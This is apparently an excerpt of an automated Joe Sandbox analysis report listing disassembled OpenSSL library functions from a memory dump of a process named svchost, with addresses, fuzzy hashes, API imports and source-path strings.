                                                                                              • Instruction ID: d929f633504f518d70d410023855031cdb5885f6419eea4da040c73084a91e5b
                                                                                              • Opcode Fuzzy Hash: f9c72873d159070fe3c3de754aa628ec22fe2a5cd73b99806cc2c20f871fd2a2
                                                                                              • Instruction Fuzzy Hash: FE21C5B1F1E55282E762EB76E4825BD2351DF44784F449031EE2D43BBADE2DE889CB01
                                                                                              Function 00007FFBAB4942F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_ctrlR_vset_errorX_copy_exX_freeX_new
                                                                                              • String ID: ssl\statem\statem_lib.c$tls13_save_handshake_digest_for_pha
                                                                                              • API String ID: 2639689059-3177854109
                                                                                              • Opcode ID: a36fa249412389ced1db71282d3d9998b7980c6ed1b9b2bfdc3ff92e1ae8450d
                                                                                              • Instruction ID: fa8f730e3b5768351ebf3d9d910f671a61f2204e64223d6349f4a0722a4ac618
                                                                                              • Opcode Fuzzy Hash: a36fa249412389ced1db71282d3d9998b7980c6ed1b9b2bfdc3ff92e1ae8450d
                                                                                              • Instruction Fuzzy Hash: CA1151A1F1A64281F763E772D8927FD2350AF54784F488831DE2C476B2EF2CE5898351
                                                                                              Function 00007FFBAB436AD0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrlO_freeO_newO_s_fileR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_SESSION_print_fp$ssl\ssl_txt.c
                                                                                              • API String ID: 1031916422-4183950648
                                                                                              • Opcode ID: f860aa753991a1079c50b203189b50f807c7aae2dd5aeb95d03b4119546f1b9c
                                                                                              • Instruction ID: 8a5841fcabefb2f249990e72317b64192557a8db0d285ae54d000de7e7f508fb
                                                                                              • Opcode Fuzzy Hash: f860aa753991a1079c50b203189b50f807c7aae2dd5aeb95d03b4119546f1b9c
                                                                                              • Instruction Fuzzy Hash: 4401C8A1B1A65281FA62E776E9825BD6351EF44BC0F448431FE2D43BA7DE2CE4458B00
                                                                                              Function 00007FFBAB416EF0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_ctrlO_freeO_newO_s_memR_newR_set_debugR_vset_errorX_free
                                                                                              • String ID: ssl3_init_finished_mac$ssl\s3_enc.c
                                                                                              • API String ID: 3393778312-3380058700
                                                                                              • Opcode ID: e18d4a600228203b23fd97f651458957ec24ff9a58d4f8612b7ba9ed4eeb9e06
                                                                                              • Instruction ID: db2acc2b46e5f0cc354973423e5ef06442fafc9709eb16ea8d75f0eaf0755eac
                                                                                              • Opcode Fuzzy Hash: e18d4a600228203b23fd97f651458957ec24ff9a58d4f8612b7ba9ed4eeb9e06
                                                                                              • Instruction Fuzzy Hash: 86115672B4974241EB62EB71F9927FE2350EB48B84F448531DE2C477A6DE3DE4488711
                                                                                              Function 00007FFBAB466C35 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_puts$O_printf
                                                                                              • String ID: <unexpected trailing frame data skipped>$ Max Streams: %llu$ (Bidi)$ (Uni)$Max streams
                                                                                              • API String ID: 4098839300-73837845
                                                                                              • Opcode ID: dc43fb59d32bbb45ff72d1986f3e6e7f1fb858d7f61a5e62696225e2d27b3cf4
                                                                                              • Instruction ID: 8dedf0b842c4e7d9c74eab1bba6be20e453044816ed04979412ea55e09157bb2
                                                                                              • Opcode Fuzzy Hash: dc43fb59d32bbb45ff72d1986f3e6e7f1fb858d7f61a5e62696225e2d27b3cf4
                                                                                              • Instruction Fuzzy Hash: DF011BE2E0A64294FE26DB75E8512FD27A1AF44794F449036DE2E476A5DE7CE0868200
                                                                                              Function 00007FFBAB41C3E0 Relevance: 15.1, APIs: 10, Instructions: 99COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • X509_get_subject_name.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4AC
                                                                                              • X509_NAME_dup.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4B9
                                                                                              • OPENSSL_sk_find.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4CC
                                                                                              • X509_NAME_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4D8
                                                                                              • OPENSSL_sk_push.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4E5
                                                                                              • OSSL_STORE_INFO_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4F1
                                                                                              • OSSL_STORE_eof.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C4F9
                                                                                              • ERR_clear_error.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C506
                                                                                              • X509_NAME_free.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C510
                                                                                              • OSSL_STORE_close.LIBCRYPTO-3-X64(?,?,00000001,00007FFBAB41BDFE), ref: 00007FFBAB41C51B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: X509_$E_free$E_closeE_dupE_eofL_sk_findL_sk_pushO_freeR_clear_errorX509_get_subject_name
                                                                                              • String ID:
                                                                                              • API String ID: 2042042120-0
                                                                                              • Opcode ID: 720656e64d7e1fdc1c214f3e6499e0f174ef5a63f77c434a52f6c6fa4d383162
                                                                                              • Instruction ID: 1e2b01a12cc1e6d491ba7d3d1db109dfb2fa5fe0ad5d207d75da21e8d2c827e0
                                                                                              • Opcode Fuzzy Hash: 720656e64d7e1fdc1c214f3e6499e0f174ef5a63f77c434a52f6c6fa4d383162
                                                                                              • Instruction Fuzzy Hash: D0313C90F4F26341FD76A632E99237D12805F85BC4F488435ED2E9BBA7EE2CE4854205
                                                                                              Function 00007FFBAB426950 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 155COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB46612C,?,00007FFBAB44F4D2,?,00007FFBAB450F40), ref: 00007FFBAB42699C
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB46612C,?,00007FFBAB44F4D2,?,00007FFBAB450F40), ref: 00007FFBAB4269B4
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(?,00007FFBAB46612C,?,00007FFBAB44F4D2,?,00007FFBAB450F40), ref: 00007FFBAB4269C4
                                                                                              • ASYNC_get_current_job.LIBCRYPTO-3-X64 ref: 00007FFBAB426A1B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: C_get_current_jobR_newR_set_debugR_set_error
                                                                                              • String ID: SSL_do_handshake$expect_quic$ssl\quic\quic_impl.c$ssl\ssl_lib.c
                                                                                              • API String ID: 2134390360-1983154402
                                                                                              • Opcode ID: 65262653f3e098f495c12320a0e5f1a27c419ec530ea063dc5ceeadd3c499906
                                                                                              • Instruction ID: e616283cab5c640c21ebc0701c7bf1fa70c015d0b5e3775dd54a541d84849147
                                                                                              • Opcode Fuzzy Hash: 65262653f3e098f495c12320a0e5f1a27c419ec530ea063dc5ceeadd3c499906
                                                                                              • Instruction Fuzzy Hash: 93618172E0AB4182FB129B35E44126E7761FB89B84F148235EE6D477A9DF3CE590CB40
                                                                                              Function 00007FFBAB472490 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_error$O_zalloc
                                                                                              • String ID: dtls_new_record_layer$ssl\record\methods\dtls_meth.c
                                                                                              • API String ID: 1179349375-3471712714
                                                                                              • Opcode ID: 6db6121e2491ace65a8629b3873d2ff3ea484f636a9cac0f3fe2f1af3cbcabf9
                                                                                              • Instruction ID: a557e81fae0cb0cfddfbdd2c4828d77e271b9d5d6e91d51f71fe087253a64c61
                                                                                              • Opcode Fuzzy Hash: 6db6121e2491ace65a8629b3873d2ff3ea484f636a9cac0f3fe2f1af3cbcabf9
                                                                                              • Instruction Fuzzy Hash: 9A610676609B8586D761DB25E4843AE73A4F789B94F108136EEDC43BA9CF3CD485CB00
                                                                                              Function 00007FFBAB4429A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EVP_MD_CTX_new.LIBCRYPTO-3-X64 ref: 00007FFBAB4429EB
                                                                                              • EVP_DigestInit_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB442A20
                                                                                              • EVP_DigestUpdate.LIBCRYPTO-3-X64 ref: 00007FFBAB442A46
                                                                                              • EVP_DigestFinal_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB442A63
                                                                                              • EVP_DigestInit_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB442A79
                                                                                              • EVP_DigestFinal_ex.LIBCRYPTO-3-X64 ref: 00007FFBAB442A93
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_MD_get0_name.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435A0
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435B8
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_new.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435D4
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435EC
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4435FD
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_CTX_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443605
                                                                                                • Part of subcall function 00007FFBAB443520: EVP_KDF_CTX_free.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443641
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_new.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB44364F
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443667
                                                                                                • Part of subcall function 00007FFBAB443520: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443678
                                                                                                • Part of subcall function 00007FFBAB443520: OSSL_PARAM_construct_octet_string.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB44372C
                                                                                                • Part of subcall function 00007FFBAB443520: OSSL_PARAM_construct_octet_string.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB44375E
                                                                                                • Part of subcall function 00007FFBAB443520: OSSL_PARAM_construct_octet_string.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB443797
                                                                                                • Part of subcall function 00007FFBAB443520: OSSL_PARAM_construct_end.LIBCRYPTO-3-X64(00000000,00000001,00000000,00000000,?,?,?,00000000,00007FFBAB45E01B,?,?,?,?,?,?,?), ref: 00007FFBAB4437BE
                                                                                              • EVP_MD_CTX_free.LIBCRYPTO-3-X64 ref: 00007FFBAB442B68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Digest$M_construct_octet_stringX_free$Final_exInit_exR_newR_set_debugR_set_error$D_get0_nameF_freeM_construct_endUpdateX_new
                                                                                              • String ID: exporter
                                                                                              • API String ID: 4114161048-111224270
                                                                                              • Opcode ID: d3a93953a9a2b8158966f39835a97e10052aea8e4a0e1c0a4b36522bad2b9ee7
                                                                                              • Instruction ID: b5816f4ef1cdf9f5a400e30dd6f1cd2548c68d1153ba2c38e96c60ac58099d07
                                                                                              • Opcode Fuzzy Hash: d3a93953a9a2b8158966f39835a97e10052aea8e4a0e1c0a4b36522bad2b9ee7
                                                                                              • Instruction Fuzzy Hash: 32416776619BC285EA65DF26E5502EAB3A4FB8DBC4F008035EE9C47B65EF3CD5148B00
                                                                                              Function 00007FFBAB416102 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 119COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EVP_MD_get_size.LIBCRYPTO-3-X64 ref: 00007FFBAB416176
                                                                                              • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFBAB4161FC
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFBAB41620A
                                                                                                • Part of subcall function 00007FFBAB4719B0: ERR_new.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFBAB47009E,?,00000000,000004A0), ref: 00007FFBAB471B14
                                                                                                • Part of subcall function 00007FFBAB4719B0: ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFBAB47009E,?,00000000,000004A0), ref: 00007FFBAB471B2C
                                                                                                • Part of subcall function 00007FFBAB4719B0: ERR_set_error.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFBAB47009E,?,00000000,000004A0), ref: 00007FFBAB471B3D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$D_get_sizeR_set_error
                                                                                              • String ID: ssl3_change_cipher_state$ssl\s3_enc.c$u
                                                                                              • API String ID: 1223758721-1779087871
                                                                                              • Opcode ID: 70e912de66dbf58922ecb734d36fe2215cb4350b4c20fc56dcf644421a8ca58e
                                                                                              • Instruction ID: b29a6b3eaa25922f6a4d2e5d375a63eee91f3b60704f95d16cda7ed19191dcf0
                                                                                              • Opcode Fuzzy Hash: 70e912de66dbf58922ecb734d36fe2215cb4350b4c20fc56dcf644421a8ca58e
                                                                                              • Instruction Fuzzy Hash: E341C1B2A0AA4181E621DB26F8456BE73A8FB88B80F548136DF9D43B65DF3CD546C700
                                                                                              Function 00007FFBAB4948B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 114COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newmemcpy$R_set_debug
                                                                                              • String ID: CLIENT_RANDOM$ssl\statem\statem_lib.c$tls_construct_finished
                                                                                              • API String ID: 3909032045-44254327
                                                                                              • Opcode ID: 2ba7dd0ee7205c1b6e8c25e3da90c80019bc56a77d4ef2b527cd34628bd4a920
                                                                                              • Instruction ID: 4300048703de16188455eeea0c4e5333ce89a90844741af02faf0ad66d44ce3d
                                                                                              • Opcode Fuzzy Hash: 2ba7dd0ee7205c1b6e8c25e3da90c80019bc56a77d4ef2b527cd34628bd4a920
                                                                                              • Instruction Fuzzy Hash: 205197B2A0A68281EBA2DF35D4D47FD23A4EB44B88F148036DE5D476A5DF39E485C390
                                                                                              Function 00007FFBAB47E270 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_construct_ctos_padding
                                                                                              • API String ID: 193678381-1618130649
                                                                                              • Opcode ID: 1f5e9d3c769b1e08d8cfc1214b8d5ceef8da802e931fc7541ffb154937d8c312
                                                                                              • Instruction ID: 4848ce13f9673bea15275c4c37c57ed4dd24a7024e5aff55b4ce48401f261e8d
                                                                                              • Opcode Fuzzy Hash: 1f5e9d3c769b1e08d8cfc1214b8d5ceef8da802e931fc7541ffb154937d8c312
                                                                                              • Instruction Fuzzy Hash: 3141A1A2B0A64282EB529736E4813BD63A4EF85B94F188531DF6C477E6DE2DD581C700
                                                                                              Function 00007FFBAB490C20 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 73COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • BUF_MEM_grow_clean.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490C90
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490C9A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490CB2
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490D25
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490D31
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB491816,?,?,?,?,?,00007FFBAB491D76,00000000,?,?,?,?,?,00000000,00007FFBAB491AED), ref: 00007FFBAB490D49
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug$M_grow_clean
                                                                                              • String ID: dtls1_preprocess_fragment$ssl\statem\statem_dtls.c
                                                                                              • API String ID: 3867660093-338339041
                                                                                              • Opcode ID: 57e514b6f8a84391c9b50a7fae2513a6fb5404a5aa9860a2d17937c9f84f7181
                                                                                              • Instruction ID: 4d4d48bf19237fdec99d016fe9adfe4c8de81051f9fdf664dd6f5c5e1ca9db3d
                                                                                              • Opcode Fuzzy Hash: 57e514b6f8a84391c9b50a7fae2513a6fb5404a5aa9860a2d17937c9f84f7181
                                                                                              • Instruction Fuzzy Hash: 6431A4B2B0A68185E752DB75D4913BD2760FB48B84F488532DFAC477A6CF3CE5868700
                                                                                              Function 00007FFBAB41EBD0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
